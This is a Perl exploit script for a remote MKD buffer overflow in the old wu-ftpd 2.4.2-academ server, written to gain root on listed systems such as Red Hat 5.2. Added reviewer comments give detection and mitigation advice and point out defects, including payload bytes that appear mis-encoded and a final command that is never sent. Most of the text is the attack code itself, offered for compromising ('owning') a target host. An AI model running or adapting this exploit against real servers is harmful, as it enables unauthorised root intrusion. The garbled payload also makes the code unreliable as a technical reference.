#!/usr/bin/perl

# ABOUT:
#  wu-ftpd.pl v1 by ben-z !! wu-2.4.2-academ[BETA-18](1) remote overflow.
#  exploits a flaw in the MKD function of wu-ftpd to remotely compromise
#  a system and obtain root access. below is a list of affected systems.
#
# System              | Description                  | Vulnerable
# --------------------------------------------------------------------
# Redhat 5.2          | installed by default         | yes
# Caldera 1.3         | installed by default         | yes
# *bsd		    | usually installed	           | yes
# --------------------------------------------------------------------
#
# THANKS:
#  #fts(2), #bitchx, #slackware, #violators @ undernet.org
#  #underground and #slackware @ irc.psychic.com
#  everyone on irc.slacknet.org, metalman, eklipz, axion, madli0n,
#  chawp, aj, magicfx, rhodie, dpad, fenix, and folk.
#
# ANTI-THANKS:
#  bXlogic you're lame and everyone hates you. stop ripping my code

# Startup banner. These literal strings are written to stdout on every run.
print
    "===================================================================\n",
    "= <wu-ftpd.pl>: brought to you by ben-z and #fts(2)\@undernet.org  =\n",
    "===================================================================\n\n";

# Default size of the filler string later placed in the MKD argument; an
# optional fifth command-line argument replaces it further down the script.
$length = 256;

# Number of command-line arguments supplied.
$ARGC = scalar(@ARGV);

# With fewer than three arguments, print the usage text and stop before any
# network activity. The usage text names the inputs the script relies on: a
# target host, a directory the login can write to, and FTP credentials
# (anonymous is enough if such a directory exists).
unless ($ARGC >= 3) {
    print for (
        "<wu-ftpd.pl>: Syntax: $0 <host> <dir> <login> <pass> [offset(256)]\n",
        "-- Host: address of wu-ftpd server to own --\n",
        "-- Directory: the full path of a directory <login> has write access to\n",
        "-- Login: ftp login name (Anonymous if you dont have an account) --\n",
        "-- Password: ftp password (if Anonymous, use an email address)\n",
        "-- Offset: length of string to use (the default should work)\n",
    );
    exit;
}
use Socket;


# Collect the connection parameters and resolve the server address.
# Only the names in this my() list are lexical; $rdir, $rlogin, $rpass and
# $string are package globals (the file has no `use strict`). $line is
# declared but not used in the lines shown.
my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
# FTP control port, hard-coded.
$port = "21";
# Directory on the server in which the login must be able to create entries.
$rdir=$ARGV[1];
$rlogin=$ARGV[2];
$rpass=$ARGV[3];
# Optional fifth argument overrides the default filler length of 256.
if ($ARGV[4]) {
 $length=$ARGV[4];
}
# Filler of $length '?' characters; it becomes the bulk of the directory name
# passed to MKD below. Reviewer note (defensive): an MKD argument of this
# size is far longer than a legitimate directory name, so argument length on
# MKD is a simple thing to bound server-side and to alert on in FTP logs or
# network sensors.
$string="?" x $length;
print "<wu-ftpd.pl>: Attempting overflow on $remote [offset: $length]\n";
# Resolve the host and build the sockaddr / protocol number for a TCP socket.
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

# FTP control-channel dialogue. Every command is written back-to-back with a
# bare "\n" terminator and no reply is read until the final loop, so the
# script never checks a reply code (login success, CWD success, ...).
# Reviewer note (defensive): per the file header the affected build is
# wu-2.4.2-academ[BETA-18]; the practical mitigations are running a fixed or
# different FTP server and not giving anonymous or low-trust logins a writable
# directory, since the sequence below depends on CWD into one. The traffic is
# recognisable by LF-only pipelined commands and an oversized MKD argument
# containing non-printable bytes.
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";;
# Log in with the supplied credentials and change into the writable directory.
$msg = "USER $rlogin\n"; 
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "PASS $rpass\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "CWD $rdir\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
# The oversized MKD request: the '?' filler followed by trailing bytes and the
# text "bin/sh". NOTE(review): the bytes after $string look mis-encoded in
# this copy (probably raw binary in the original) and cannot be recovered from
# the page; "\H" is not a Perl string escape, so as written it is a literal "H".
$msg = "MKD $string\Hüÿ¿Hüÿ¿bin/sh\n";
# The same request is sent twice. send() only reports a local socket error, so
# neither die message says anything reliable about how the server responded,
# despite the "(patched)" wording on the second one.
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
send(SOCK, $msg, 0) or die "Server Error! (patched): $!";
# Follow-up commands that create and enter a directory named "bin".
$msg = "MKD bin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "CWD bin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
# This last command string is assigned, but no send() follows it in this
# listing, so "MKD sh" is not part of the traffic the script generates.
$msg = "MKD sh\n";
# Echo everything the server returns until it closes the connection. The
# script does not interpret the replies.
while (<SOCK>) {
   print; 
}
print "<wu-ftpd.pl>: done. please visit http://www.slacknet.org\n";   
exit;               
